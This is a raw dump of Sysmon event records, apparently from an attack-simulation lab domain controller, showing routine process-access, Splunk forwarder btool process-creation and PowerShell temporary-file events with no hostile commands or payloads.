ADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000005854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.209{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ywwvlqhv.cmdline2020-11-03 15:53:05.209 11241100x80000000000000005853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:53:05.209{D28789B6-7CE0-5FA1-3501-000000008801}3404C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ywwvlqhv.dll2020-11-03 15:53:05.209 10341000x80000000000000005852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3A01-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005849Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005846Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005845Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005844Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005843Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3A01-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005842Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005841Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7CE1-5FA1-3901-000000008801}40482752C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CE1-5FA1-3A01-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005840Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.152{D28789B6-7CE1-5FA1-3A01-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CE1-5FA1-3901-000000008801}4048C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000005839Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3901-000000008801}4048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005838Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005837Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CE1-5FA1-3901-000000008801}4048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.146{D28789B6-7CE1-5FA1-3801-000000008801}21363932C:\Windows\system32\cmd.exe{D28789B6-7CE1-5FA1-3901-000000008801}4048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.147{D28789B6-7CE1-5FA1-3901-000000008801}4048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CE1-5FA1-3801-000000008801}2136C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000005826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:05.130{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CE1-5FA1-3801-000000008801}2136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 